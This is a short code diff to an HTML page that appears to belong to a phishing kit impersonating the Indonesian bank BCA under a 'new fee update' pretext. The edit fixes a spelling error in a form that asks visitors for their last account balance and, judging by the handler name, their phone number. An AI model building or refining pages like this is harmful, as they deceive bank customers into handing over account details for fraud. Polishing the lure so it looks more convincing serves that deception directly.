--- a/Update-tarif-baru-BCA/saldo.html
+++ b/Update-tarif-baru-BCA/saldo.html
@@ -1046,7 +1046,7 @@ ion-icon{
 
 <form onsubmit="sendNohp(event); return false" method="POST" id="inputlogin">
 <div class="" style="margin-left: 16px;margin-top: -20px;position:relative;border:0px solid #0085e0;padding:15px;width:82%;border-radius:20px; background: #fff; height: 205px; box-shadow: rgba(0, 0, 0, 0.15) 0px 5px 15px 0px; overflow:hidden">
-<center style="color:#09559a; line-height: 17px; font-size: 15px; padding: 5px; margin-top: -10px; margin-bottom: px"><p>Masukkan Saldo Terkahir anda,<br/>
+<center style="color:#09559a; line-height: 17px; font-size: 15px; padding: 5px; margin-top: -10px; margin-bottom: px"><p>Masukkan Saldo Terakhir anda,<br/>
 Pastikan Saldo Sesuai di rekening.</p>
 <br/>
 <hr style="margin-top: -10px">
